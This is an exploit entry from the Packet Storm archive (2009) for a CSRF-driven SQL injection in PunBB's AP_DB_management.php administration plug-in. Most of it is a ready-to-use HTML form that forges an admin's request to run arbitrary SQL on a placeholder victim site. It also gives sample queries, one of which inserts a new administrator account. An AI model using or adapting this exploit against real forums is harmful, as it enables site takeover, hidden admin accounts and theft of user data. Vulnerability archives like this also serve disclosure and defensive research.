PunBB AP_DB_management.php SQL Injection

2009-06-29T00:00:00
ID PACKETSTORM:78729
Type packetstorm
Reporter Dante90
Modified 2009-06-29T00:00:00

Description

                                        
                                            `######################################################################################  
#  
#  
# Author: Dante90, WaRWolFz  
Crew #  
# Title: PunBB (AP_DB_management.php) Remote SQL Injection CSRF By Dante90  
[0-Day] #  
# MSN: dante90.dmc4@hotmail.it  
#  
# Web: www.warwolfz.org  
#  
#  
#  
######################################################################################  
  
[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote  
SQL Injection CSRF Exploit By Dante90  
  
[code]  
  
<html>  
<head>  
<title>[0-Day & Priv8] PunBB Administration Plug-In  
(AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>  
</head>  
<body>  
<center><fieldset>  
<legend>Run SQL query</legend>  
<form name="Dante90" method="post" action="  
http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php  
">  
<textarea name="this_query" rows="5" cols="50">  
  
[SQL_Injection]  
  
</textarea>  
<input type="submit" name="submit" value="Run query" />  
</form>  
</fieldset></center>  
</body>  
</html>  
  
[/code]  
  
[SQL_Injection] = Insert the SQL Injection  
  
Example of SQL Injection:  
  
[code]  
SELECT * FROM users WHERE id=2;  
  
SELECT * FROM users WHERE group_id=1;  
  
INSERT INTO users (group_id, username, password, email, num_posts,  
registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',  
'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',  
'1220984516');  
[/code]  
  
[NICK_NEW_ADMIN] = New Administrator's Nick  
  
[PASSWORD_NEW_ADMIN] = New Administrator's Password  
  
[E-MAIL_NEW_ADMIN] = New Administrator's E-Mail  
  
  
Dante90  
`